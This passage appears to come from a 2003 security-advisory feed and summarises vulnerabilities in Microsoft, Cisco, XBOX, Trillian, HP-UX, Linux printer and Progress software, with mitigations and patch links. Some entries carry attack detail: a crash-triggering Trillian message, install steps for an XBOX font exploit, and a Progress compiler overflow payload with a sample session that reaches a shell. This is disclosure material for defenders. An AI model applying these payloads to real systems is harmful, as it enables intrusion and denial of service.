specially crafted MIDI file designed to exploit this vulnerability 
and then host it on a Web site or on a network share, or send it by 
using an HTML-based e-mail. In the case where the file was hosted 
on a Web site or network share, the user would need to open the 
specially crafted file. If the file was embedded in a page the 
vulnerability could be exploited when a user visited the Web page. 
In the HTML-based e-mail case, the vulnerability could be exploited 
when a user opened or previewed the HTML-based e-mail. A successful 
attack could cause DirectShow, or an application making use of 
DirectShow, to fail. A successful attack could also cause an 
attacker's code to run on the user's computer in the security 
context of the user. 

Mitigating Factors:
====================
- - By default, Internet Explorer on Windows Server 2003 runs in 
Enhanced Security Configuration. This default configuration of 
Internet Explorer blocks the e-mail-based vector of this attack 
because Microsoft Outlook Express running on Windows Server 2003 by 
default reads e-mail in plain text. If Internet Explorer Enhanced 
Security Configuration were disabled, the protections put in place 
that prevent this vulnerability from being exploited would be 
removed.
- - In the Web-based attack scenario, the attacker would have to host 
a Web site that contained a Web page used to exploit these 
vulnerabilities. An attacker would have no way to force users to 
visit a malicious Web site outside the HTML-based e-mail vector. 
Instead, the attacker would need to lure them there, typically by 
getting them to click a link that would take them to the attacker's 
site. 
- -The combination of the above means that on Windows Server 2003 an 
administrator browsing only to trusted sites should be safe from 
this vulnerability.
- - Code executed on the system would only run under the privileges 
of the logged-on user.

Patches

  http://www.microsoft.com/technet/security/bulletin/ms03-030.asp
   http://www.microsoft.com/security/security_bulletins/ms03-030.asp

Cumulative Patch for Microsoft SQL Server

2003-07-23

Risk level: Important

Type: many types

Source of info: Microsoft Security Team

Impact

This is a cumulative patch that includes the functionality of all
previously released patches for SQL Server 7.0, SQL Server 2000, MSDE
1.0, and MSDE 2000. In addition, it eliminates three newly discovered
vulnerabilities. 

Overview

This is a cumulative patch that includes the functionality of all
previously released patches for SQL Server 7.0, SQL Server 2000, MSDE
1.0, and MSDE 2000. In addition, it eliminates three newly discovered
vulnerabilities. 

 - Named Pipe Hijacking - 
Upon system startup, SQL Server creates and listens on a specific
named pipe for incoming connections to the server. A named pipe is a
specifically named one-way or two-way channel for communication
between a pipe server and one or more pipe clients. The named pipe is
checked for verification of which connection attempts can log on to
the system running SQL Server to execute queries against data that is
stored on the server.

A flaw exists in the checking method for the named pipe that could
allow an attacker local to the system running SQL Server to hijack
(gain control of) the named pipe during another client's
authenticated logon password. This would allow the attacker to gain
control of the named pipe at the same permission level as the user
who is attempting to connect. If the user who is attempting to
connect remotely has a higher level of permissions than the attacker,
the attacker will assume those rights when the named pipe is
compromised.

 - Named Pipe Denial of Service - 
In the same named pipes scenario that is mentioned in the "Named Pipe
Hijacking" section of this bulletin, it is possible for an
unauthenticated user who is local to the intranet to send a very
large packet to a specific named pipe on which the system running SQL
Server is listening and cause it to become unresponsive.
 
This vulnerability would not allow an attacker to run arbitrary code
or elevate their permissions, but it may still be possible for a
denial of service condition to exist that would require that the
server be restarted to restore functionality.

 - SQL Server Buffer Overrun - 
A flaw exists in a specific Windows function that may allow an
authenticated user-with direct access to log on to the system running
SQL Server-the ability create a specially crafted packet that, when
sent to the listening local procedure call (LPC) port of the system,
could cause a buffer overrun. 
If successfully exploited, this could allow a user with limited
permissions on the system to elevate their permissions to the level
of the SQL Server service account, or cause arbitrary code to run.

Mitigating Factors:
====================
Named Pipe Hijacking:
 - To exploit this flaw, the attacker would need to be an
   authenticated user local to the system.
 - This vulnerability provides no way for an attacker to remotely
   usurp control over the named pipe.

Named Pipe Denial of Service:
 - Although it is unnecessary that the attacker be authenticated,
   to exploit this flaw the attacker would require access to the 
   local intranet. 
 - Restarting the SQL Server Service will reinstate normal
   operations
 - This flaw provides no method by which an attacker can gain 
   access to the system or information contained in the database. 

SQL Server Buffer Overrun:
 - To exploit this flaw, the attacker would need to be an
   authenticated user local to the system.
 - This vulnerability cannot be remotely exploited.

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-031.asp http://www.microsoft.com/security/security_bulletins/ms03-031.asp

Critical security vulnerability in Microsoft Operating Systems

2003-07-17

Risk level: high

Type: Buffer overflow

Source of info: LSD

Impact

LSD has discovered a critical security vulnerability in all recent versions of
Microsoft operating systems. The vulnerability affects default installations
of Windows NT 4.0, Windows 2000, Windows XP as well as Windows 2003 Server.

Overview

This is a buffer overflow vulnerability that exists in an integral component of
any Windows operating system, the RPC interface implementing Distributed Component
Object Model services (DCOM). In a result of implementation error in a function
responsible for instantiation of DCOM objects, remote attackers can obtain
unauthorized access to vulnerable systems.

The existence of the vulnerability has been confirmed by Microsoft Corporation.
The appropriate security bulletin as well as fixes for all affected platforms
are available for download from http://www.microsoft.com/security/ (MS03-026).

It should be emphasized that this vulnerability poses an enormous threat and
appropriate patches provided by Microsoft should be immediately applied.

Patches

http://www.microsoft.com/security/

Cisco IOS Interface Blocked by IPv4 Packet

2003-07-17

Risk level: high

Type: DoS

Source of info: Cisco Systems

Impact

Cisco routers and switches running Cisco IOS® software and configured to
process Internet Protocol version 4 (IPv4) packets are vulnerable to a
Denial of Service (DoS) attack. A rare sequence of crafted IPv4 packets
sent directly to the device may cause the input interface to stop
processing traffic once the input queue is full. No authentication is
required to process the inbound packet. Processing of IPv4 packets is
enabled by default. Devices running only IP version 6 (IPv6) are not
affected. A workaround is available.

Cisco has made software available, free of charge, to correct the problem.

Overview

Summary
=======

Cisco routers and switches running Cisco IOS® software and configured to
process Internet Protocol version 4 (IPv4) packets are vulnerable to a
Denial of Service (DoS) attack. A rare sequence of crafted IPv4 packets
sent directly to the device may cause the input interface to stop
processing traffic once the input queue is full. No authentication is
required to process the inbound packet. Processing of IPv4 packets is
enabled by default. Devices running only IP version 6 (IPv6) are not
affected. A workaround is available.

Cisco has made software available, free of charge, to correct the problem.

This advisory is available at 
http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml.

Affected Products
=================

This issue affects all Cisco devices running Cisco IOS software and
configured to process Internet Protocol version 4 (IPv4) packets. Cisco
devices which do not run Cisco IOS software are not affected. Devices which
run only Internet Protocol version 6 (IPv6) are not affected.

Details
=======

Cisco routers are configured to process and accept Internet Protocol
version 4 (IPv4) packets by default. A rare, specially crafted sequence of
IPv4 packets which is handled by the processor on a Cisco IOS device may
force the device to incorrectly flag the input queue on an interface as
full, which will cause the router to stop processing inbound traffic on
that interface. This can cause routing protocols to drop due to dead
timers.

On Ethernet interfaces, Address Resolution Protocol (ARP) times out after a
default time of four hours, and no traffic can be processed. The device
must be rebooted to clear the input queue on the interface, and will not
reload without user intervention. The attack may be repeated on all
interfaces causing the router to be remotely inaccessible. A workaround is
available, and is documented in the Workarounds section.

The following two Cisco vulnerabilities are documented in DDTS. CSCea02355
( registered customers only) affects all Cisco routers running Cisco IOS
software. CSCdz71127 ( registered customers only) was introduced by an
earlier code revision. Any version of software which has the fix for 
CSCdx02283 ( registered customers only) is vulnerable.

Registered customers can find more details using the Bug Toolkit at 
http://www.cisco.com/cgi-bin/Support/Bugtool/launch_bugtool.pl ( registered
customers only) .

To identify a blocked input interface, use the show interfaces command and
look for the Input Queue line. If the current size (in this case, 76) is
larger than the maximum size (75), the input queue is blocked.

Impact
======

A device receiving these specifically crafted IPv4 packets will force the
inbound interface to stop processing traffic. The device may stop
processing packets destined to the router, including routing protocol
packets and ARP packets. No alarms will be triggered, nor will the router
reload to correct itself. This issue can affect all Cisco devices running
Cisco IOS software. This vulnerability may be exercised repeatedly
resulting in loss of availability until a workaround has been applied or
the device has been upgraded to a fixed version of code.

Software Versions and Fixes
===========================

Each row of the table describes a release train and the platforms or
products for which it is intended. If a given release train is vulnerable,
then the earliest possible releases that contain the fix and the
anticipated date of availability for each are listed in the Rebuild,
Interim, and Maintenance columns. In some cases, no rebuild of a particular
release is planned; this is marked with the label "Not scheduled." A device
running any release in the given train that is earlier than the release in
a specific column (less than the earliest fixed release) is known to be
vulnerable, and it should be upgraded at least to the indicated release or
a later version (greater than the earliest fixed release label).

When selecting a release, keep in mind the following definitions:

  * Maintenance
   
    Most heavily tested and highly recommended release of any label in a
    given row of the table.
   
  * Rebuild
   
    Constructed from the previous maintenance or major release in the same
    train, it contains the fix for a specific vulnerability. Although it
    receives less testing, it contains only the minimal changes necessary
    to effect the repair. Cisco has made available several rebuilds of
    mainline trains to address this vulnerability, but strongly recommends
    running only the latest maintenance release on mainline trains.
   
  * Interim
   
    Built at regular intervals between maintenance releases and receives
    less testing. Interims should be selected only if there is no other
    suitable release that addresses the vulnerability, and interim images
    should be upgraded to the next available maintenance release as soon as
    possible. Interim releases are not available through manufacturing, and
    usually they are not available for customer download from CCO without
    prior arrangement with the Cisco Technical Assistance Center (TAC).
   
In all cases, customers should exercise caution to be certain the devices
to be upgraded contain sufficient memory and that current hardware and
software configurations will continue to be supported properly by the new
release. If the information is not clear, contact the Cisco TAC for
assistance.

Patches

http://www.cisco.com/tacpage/sw-center/sw-ios.html. 

Flaw in ISA Server Error Pages Could Allow Cross-Site Scripting Attack (816456)

2003-07-16

Risk level: Important

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

ISA Server contains a number of HTML-based error pages that allow 
the server to respond to a client requesting a Web resource with 
a customized error. A cross-site scripting vulnerability exists 
in many of these error pages that are returned by ISA Server 
under specific error conditions.

Overview

To exploit this flaw, an attacker would have to first be aware of 
a specific ISA server and its access policies or host an ISA 
server of their own and create specific access policies designed 
to exploit this vulnerability. The attacker could then craft a 
request to trigger a page refusal. Once the attack was crafted, 
the attacker would have to host a Web site containing the link, 
or send the link to the user in the form of an HTML e-mail. After 
the user previewed or opened the e-mail, the malicious site could 
be visited automatically without further user interaction. In the 
Web-based attack scenario, an attacker would have no way to force 
a user to visit the Web site. 

Mitigating factors: 
====================

 - The vulnerability could only be exploited if the attacker 
could entice another user into visiting a Web page and clicking a 
link on it, or opening an HTML-based e-mail.
 
 - The request must be one that would cause the ISA server to 
respond with one of several affected error pages. 

 - The vulnerability would not normally enable an attacker to 
gain any privileges on an affected ISA Server computer, breach 
the firewall, or compromise any cached content, unless the user 
is operating on the ISA server itself and is using the Web Proxy 
service to access the Internet. 

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-028.asp
http://www.microsoft.com/security/security_bulletins/ms03-028.asp

Unchecked Buffer in Windows Shell Could Enable System Compromise

2003-07-16

Risk level: high

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

It is possible to run code of attacker's choice.

Overview

The Windows shell is responsible for providing the basic 
framework of the Windows user interface experience. It is most 
familiar to users as the Windows desktop. It also provides a 
variety of other functions to help define the user's computing 
session, including organizing files and folders, and providing 
the means to start programs. 

An unchecked buffer exists in one of the functions used by the 
Windows shell to extract custom attribute information from 
certain folders. A security vulnerability results because it is 
possible for a malicious user to construct an attack that could 
exploit this flaw and execute code on the user's system. 

An attacker could seek to exploit this vulnerability by creating 
a Desktop.ini file that contains a corrupt custom attribute, and 
then host it on a network share. If a user were to browse the 
shared folder where the file was stored, the vulnerability could 
then be exploited. A successful attack could have the effect of 
either causing the Windows shell to fail, or causing an 
attacker's code to run on the user's computer in the security 
context of the user. 

Mitigating factors:<BR>

 - In the case where an attacker's code was executed, the code 
would run in the security context of the user. As a result, any 
limitations on the user's ability would also restrict the actions 
that an attacker's code could take. 
<BR>
 - An attacker could only seek to exploit this vulnerability by 
hosting a malicious file on a share. 
<BR>
 - This vulnerability only affects Windows XP Service Pack 1. 
Users running Windows XP Gold are not affected. 

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-027.asp
http://www.microsoft.com/security/security_bulletins/ms03-027.asp
   

Trillian Remote DoS

2003-07-05

Risk level: high

Type: DoS

Source of info: FLUR

Impact

It is possible to crash Trillian by sending a corrupt 'TypingUser' message. Replacing any of the characters in 'TypingUser' will cause Trillian to crash. If more then 10 characters are used, or if the colon is omitted, Trillian will not crash. The crash occurs due to a function within msn.dll for both Trillian 1 and 0.74. This may be exploitable further.

Overview

In order to exploit this condition, no code is necessary- simply hex edit a  messenger client, replacing the string 'TypingUser' with any other string of the same length (or simply changing a letter or two). However this method of exploitation does break Microsoft's EULA/TOS, and you are not encouraged to utilize a broken client in this way except in an educational context. This 'hack' also prevents other non-trillian Messenger clients from detecting when a user is typing.

Crash Summary:

MOV ECX,DWORD PTR DS:[EDX]  ; EDX is uninitialized

The crash looks something like this:

Instruction at 0x####8826 referenced memory at 0x00000000

Sample TCP session to crash Trillian:

MIME-Version: 1.0
Content-Type: text/x-msmsgscontrol
TypingXxxx: attacker@blah.com

Our preliminary tests showed that memory was not manipulable, and thus this bug is not exploitable further then DoS. Please make further research public if you discover otherwise. 

XBOX Dashboard local vulnerability

2003-07-04

Risk level: high

Type: Buffer overflow

Source of info: XBOX security

Impact

 The XBOX Dashboard is what appears when you turn the XBOX on without a 
   disc in the DVD drive. It will let you adjust system settings, manage
   your save games, play and rip audio CDs and configure your XBOX Live
   account. It is the heart of the XBOX and its most vulnerable point, 
   because it lacks several security restrictions which are enforced on 
   games. This includes the lack of the reboot-on-eject-button "feature",
   which is obligatory for all games.
   
   The existance of an exploitable vulnerability within the dashboard could
   totally compromises the XBOX security system. It will make the box 
   independent from Microsoft signed code and therefore this information is
   released to the public now on the 4th of July 2003, the day of the XBOX
   Independence.
   

Overview

Details:
   
   Microsoft knows that a vulnerability within the XBOX dashboard could 
   have serious impact. This is underlined by the fact that the dashboard 
   checks most of its files against an internal stored SHA1 hash value 
   before it uses them. 
   
   For an unknown reason this check is not performed on the audio (.wav) 
   and font (.xtf) files. Unfourtunately for Microsoft there exists an 
   exploitable integer underflow vulnerabilitiy within the font file loader
   which can be exploited with a malformed font file. When the XTF header 
   is processed the dashboards reads a 4 byte blocksize field from the font
   file. This is expected to represent the size of some datablock including
   the 4 bytes of the size field itself. The blocksize is then allocated 
   and the sizefield is copied into the  beginning of the buffer. This is 
   already a possible overflow bug when the field contains the values 0..3.
   Due to memory alignment this is not exploitable. But then the blocksize
   is decreased by 4 because the dashboard wants to read the rest of  the 
   block into memory. Obviously values of 0..3 will underflow when 
   decreased by 4 and this results in the dashboard wanting to read up to 
   ~4 gigabytes of data from the font file in a f.e. 3 bytes buffer.
   
   Because the XBOX malloc()/free() implementation is also storing control 
   information inbound and is similiar to the Windows 2000/XP heap 
   allocators this bug is exploitable and allows execution of arbitrary 
   code. The attached proof of concept code shows that exploiting is 
   possible with offsets that are equal on all dashboards and XBOX versions
   known.
   
   BTW: the dashboard loads its font files directly after the XBOX start 
        animation. This means the exploit does not need any user 
        interaction and when the code is executed only part of the 
        dashboard background is on screen.
   

Proof of Concept:

   Attached you will find a proof of concept exploit which will start 
   linux. To install it you have to rename the 2 XBOX font files within the
   font directory of the dashboard partition and then copy ernie.xtf and 
   bert.xtf into this directory. (If you have an XBOX with an older 
   dashboard the font directory does not exist and you must do the renaming
   and file adding work in the main directory). Once the new fonts are in 
   place you copy the default.xbe (which is a copy of xbeboot) into the 
   main directory and add your favourite linux to it.
   

Trustworthy Computing:

   Trustworthy Computing at its best. Nearly 2 Years ago I reported an SSL 
   vulnerability within IE to Microsoft. 1 month later I released 
   information about this bug to the public because MS did absolutely 
   nothing. The vulnerability was nearly forgotten, it only exists on the 
   list of 19 unpatched IE vulnerabilities anymore. But this is wrong, the
   vulnerability was indeed fixed with one of the many IE patches in the 
   middle of last year. Well is secretly fixing bugs without an official 
   advisory trustworthy?

Conectiva Security Announcement - updates for the Samsung ML-85G and QL85G printer drivers (ml85p)

2003-07-04

Risk level: high

Type: insecure temporary file

Source of info: Conectiva Security Team

Impact

 ml85p is a SUID root program and it creates temporary files
 in an insecure way, which makes it vulnerable to a race condition
 exploit. A local attacker could easily guess the name of this file
 and create a symbolic link to anywhere on the system. If the target
 exists, it will be overwritten; otherwise, it will be created with
 0666 permissions (world writable).

Overview

 ml85p[1] is a printer driver for the Samsung ML-85G and QL85G printer
 models.
 
 iDEFENSE published[2] the following vulnerabilities in some printer
 related packages, including ml85p:
 
 - mtink: this package is not distributed with Conectiva Linux;
 
 - escputil: the escputil program has a buffer overflow vulnerability
 in the way it deals with a printer name. Long enough names can be
 used to execute arbitrary code or crash the program. In Conectiva
 Linux, escputil is NOT a SGID program, so it is not possible to
 obtain higher privileges by exploiting this problem, but we are
 nevertheless including a fix with this update.
 
 - ml85p: this is a SUID root program and it creates temporary files
 in an insecure way, which makes it vulnerable to a race condition
 exploit. A local attacker could easily guess the name of this file
 and create a symbolic link to anywhere on the system. If the target
 exists, it will be overwritten; otherwise, it will be created with
 0666 permissions (world writable).
 
 There is, however, a condition for this to work: the attacker must be
 able to execute ml85p. By default, it is only executable by root or
 members of the "sys" group.


SOLUTION
 It is recommended that all ml85p and escputil users upgrade their
 packages.
 
 The ml85p package does not exist in Conectiva Linux 7: only the
 package corresponding to the escputil tool is being upgraded in that
 version of the distribution.
 
 Due to dependencies in the printer system, several other gimp-print
 packages in Conectiva Linux 8 have to be updated as well, even though
 they are not directly related to these vulnerabilities.

Patches

ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/cups-drivers-1.0-3U70_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/cups-drivers-1.0-3U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/ml85p-0.1.0-3U80_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/gimp-print-4.2.0-12U80_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/ml85p-0.1.0-3U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/escputil-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-cups-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-cups-da-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-cups-en_GB-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-cups-fr-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-cups-no-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-cups-pl-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-cups-sv-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-devel-ghostscript-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-doc-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/gimp-print-foomatic-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/libgimpprint1-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/libgimpprint1-devel-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/libgimpprint1-devel-static-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/task-gimp-print-4.2.0-12U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/task-gimp-print-cups-4.2.0-12U80_1cl.i386.rpm

Windows 2000 ShellExecute() API Let Applications to Cause Buffer Overflow

2003-07-03

Risk level: high

Type: Buffer overflow

Source of info: Secure Net Services

Impact

 A buffer overflow vulnerability exists in the Windows 2000 API 
  ShellExecute() function.

Overview

Windows API ShellExecute() is a function to run an application 
  associated with a specified file extension.

  The problem is triggered when the pointer to an unusually long string 
  is set to the 3rd argument of the Windows 2000 API Shell Execute() 
  API function.

  It has been confirmed that several applications containing web browser, 
  MUA and text editor are vulnerable to this problem.


Tested Version:
---------------
  SHELL32.DLL (Version 5.0.3502.6144)


  This problem can be rectified by installing Windows 2000 Service Pack 4.

Patches

http://www.microsoft.com/windows2000/downloads/servicepacks/sp4/default.asp

On HP-UX 10.XX pcltotiff has unsafe permissions

2003-06-20

Risk level: medium

Type: unsafe permissions

Source of info: SOFTWARE SECURITY RESPONSE TEAM (SSRT) , Hewlett-Packard Company, HP Services

Impact

A bugtraq posting on July 9, 2003 mentions a
vulnerability, buffer overflow vulnerability in the command line parsing
   code portion of the pcltotiff program on HP-UX 10.XX.
This is the subject of the security bulletin
HPSBUX0104-149

This bug can be triggered by invoking
   pcltotiff program with a long string argument passed with the -t command line
   option. During program execution, this argument is further insecurely copied
   into the stack buffer with the use of strcpy() function and without any size
   checking. When appropriately exploited this bug can lead to privilege
   elevation attack as group id of bin can be gained on a vulnerable system.

Overview

A bugtraq posting on July 9, 2003 mentions a
vulnerability in pcltotiff on HP-UX 10.XX.
This is the subject of the security bulletin
HPSBUX0104-149.  The main points are:

PROBLEM:   /opt/sharedprint/bin/pcltotiff has unsafe permissions.

PLATFORM:  HP9000 Series 700/800 running HP-UX releases 10.01,
           10.10, 10.20, and 10.26.


   A. Background

      /opt/sharedprint/bin/pcltotiff is in group bin with set group
      id permissions.  This is necessary to allow pcltotiff to read
      files in /usr/lib/X11/fonts/ifo.st/typefaces/.

   B. Fixing the problem

      Remove the set group id permissions from pcltotiff and
      allow read access to /usr/lib/X11/fonts/ifo.st/typefaces/.

   C. Recommended solution

      /sbin/chmod 555 /opt/sharedprint/bin/pcltotiff
      /sbin/chmod o+r /usr/lib/X11/fonts/ifo.st/typefaces/

 SOFTWARE SECURITY RESPONSE TEAM (SSRT)
 Hewlett-Packard Company
 HP Services

Updated Netscape 4.8 packages are now available (for Red Hat Linux)

2003-06-20

Risk level: high

Type: many types

Source of info: Red Hat Security Team

Impact

Updated Netscape 4.8 packages are now available.
Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info):
62052 - Does the netscape libflashplugin.so use an insecure zlib ??
65862 - A problem for the zh_CN.GB2312 locale
71341 - Lots of security holes in flash plugin

Overview

Synopsis:          Updated Netscape packages are now available
Advisory ID:       RHSA-2003:026-01
Issue date:        2003-06-20
Updated on:        2003-06-20
Product:           Red Hat Linux
Keywords:          netscape shockwave flash
Cross references:  
Obsoletes:         RHSA-2001:046
CVE Names:         CVE-2002-0846 CAN-2002-1467

1. Topic:

Updated Netscape 4.8 packages fixing various bugs and vulnerabilities are
now available.

2. Relevant releases/architectures:

Red Hat Linux 7.1 - i386
Red Hat Linux 7.2 - i386, ia64
Red Hat Linux 7.3 - i386

3. Problem description:

Netscape is a suite of Internet utilities including a Web browser, email
client, and Usenet news reader.

Netscape version 4.8 contains various bugfixes and updates.

Note that Macromedia Flash is no longer included as of this update. The
recommended Macromedia Flash with security fixes no longer supports
Netscape 4.x.  The security issues that affected the Macromedia Flash
player include CVE-2002-0846 and CAN-2002-1467.

It is recommended that all Netscape Communicator and Netscape Navigator
users upgrade to these errata packages.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which are
not installed but included in the list will not be updated.  Note that you
can also use wildcards (*.rpm) if your current directory *only* contains the
desired RPMs.

Please note that this update is also available via Red Hat Network.  Many
people find this an easier way to apply updates.  To use Red Hat Network,
launch the Red Hat Update Agent with the following command:

up2date

This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system.

5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info):

62052 - Does the netscape libflashplugin.so use an insecure zlib ??
65862 - A problem for the zh_CN.GB2312 locale
71341 - Lots of security holes in flash plugin

Patches

RPMs required:

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/netscape-4.8-1.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/netscape-common-4.8-1.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/netscape-communicator-4.8-1.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/netscape-navigator-4.8-1.i386.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/netscape-4.8-1.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/netscape-common-4.8-1.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/netscape-communicator-4.8-1.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/netscape-navigator-4.8-1.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/netscape-common-4.8-1.i386.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/netscape-communicator-4.8-1.i386.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/netscape-navigator-4.8-1.i386.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/netscape-4.8-1.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/netscape-common-4.8-1.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/netscape-communicator-4.8-1.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/netscape-navigator-4.8-1.i386.rpm

Progress 4GL Compiler datatype overflow

2003-06-20

Risk level: medium

Type: Buffer overflow

Source of info: Secure Network Operations, Inc.

Impact

Both the WIN32 and Unix variants of the Progress Application Compiler 
suffer from a buffer overflow in the definition of datatypes. The compiler
can be accessed in a number of ways, for example using the "-p" option with
_progres or prowin32.exe, as well as from within the Procedure Editor. 
Exploiting this issue
would only grant privs of the user running _progres or prowin32.exe

Overview

Both the WIN32 and Unix variants of the Progress Application Compiler 
suffer from a buffer overflow in the definition of datatypes. The compiler
can be accessed in a number of ways, for example using the "-p" option with
_progres or prowin32.exe, as well as from within the Procedure Editor. 

An example of a valid datatype would be "char", "integer", "date", etc. 
When the compiler attempts to parse an invalid datatype the user is presented 
with the following message. 

** Invalid datatype -- sample types are: char, integer, date, logical (222)
** overflow.p Could not understand line 1. (196)

Immediately after this message the application prompts the user to press 
the space bar to continue, then it promptly exits. 

If however the length of the invalid datatype is beyond 364 chars the 
Progress Compiler will segfault due to poor usage of memmove(). An example 
of such a data type is as follows. 

def var andrew as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA00001111

In the above example 0000 is the location of the ebp and 1111 represents 
where we wish the eip to point to. 

On *nix platforms the _progres binary is suid root however the application
does drop root privs before executing the .p file. Exploiting this issue
would only grant privs of the user running _progres. 

On Win32 exploitation can occur from within the Progress Application 
Compiler tool which simply invokes "prowin32.exe -p". Again privs of the
user running prowin32 would be obtained. 

This issue has added risk for Win32 users due to the fact that when using 
the Progress Application Compiler the user is prompted to supply a file
or directory name for compilation. If a directory name if provided the 
compiler will search for *.p and attempt to compile every instance that is 
found. If compiling occurs from a shared drive this could become an issue
because an attacker only need to drop a malicious .p file into the compile
tree. Shortly after clicking the "Start Compile" button you will notice
that the Progress Application Compiler is no longer responding if someone
has planted such a file. 

The following output is a sample exploitation scenario. 

[elguapo@rootme dlc]$ cat /usr/dlc/version
PROGRESS Version 9.1D05 as of Sun Feb  2 17:14:07 EST 2003

[elguapo@rootme dlc]$ grep system compiler_exploit.pl
system("echo $buf > overflow.p");
system("gdb /usr/dlc/bin/_progres");

[elguapo@rootme dlc]$ ./compiler_exploit.pl
(gdb) r -p overflow.ped
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40000b30 in _start () from /lib/ld-linux.so.2
(gdb) c
Continuing.
sh-2.05b$

As you can see above executing code is fairly easy. The trick is getting
the user to compile the malicious .p. Please note that the line triggering
the overflow could easily be hidden amongst many thousands of lines of 
code thus making it difficult to determine the malicious intent. Obviously
running /bin/sh would do an attacker no good however it is very easy to 
supply shellcode that binds a shell to a port for example. 

As a final note Progress does have the ability to "compile on the fly" so 
it may be possible for users of frontend Progress applications to cause the 
server to execute malicious machine code. 

Intrusec 55808 Trojan Analysis

2003-06-20

Risk level: low

Type: trojan

Source of info: Intrusec

Impact

Intrusec has completed an initial analysis of a trojan that appears to
be one of several that is responsible for generating substantial
scanning traffic across the Internet with a TCP window size of 55808.

Overview

Introduction:

Intrusec has completed an initial analysis of a trojan that appears to
be one of several that is responsible for generating substantial
scanning traffic across the Internet with a TCP window size of 55808.
The trojan we have isolated appears to match many of the characteristics
that others in the security community have reported for this trojan.
However, we do not believe that the specific trojan we have identified
is the sole source of the traffic generated, and do not know that it is
a primary source. 

The information we've been able to gather leads us to believe that the
trojan we have captured is not the original source of the 55808 traffic
that has been seen, but is rather a "copycat", created to mimic the
behavior of another trojan or worm. The behavior of this copycat appears
to be based on press releases, news articles, and mailing lists that
described its hypothetical behavior and known output. Nonetheless, this
copycat trojan appears to be actively deployed on systems across the
Internet and is something security professionals should be aware of.
Details contained in this analysis will be updated, and linked to linked
to numerous analyses that will be done by other security researchers, as
they become available. 

Please visit and link to http://www.intrusec.com/55808.html to receive
the latest 
information available regarding this trojan.  There is apt to be great
discussion about the nature of this "trojan" and whether in fact it is
accurately characterized as a trojan, backdoor, zombie, or worm. While
the specific binaries we have captured are probably described as a
trojan or zombie, there is no assurance that other variants of this
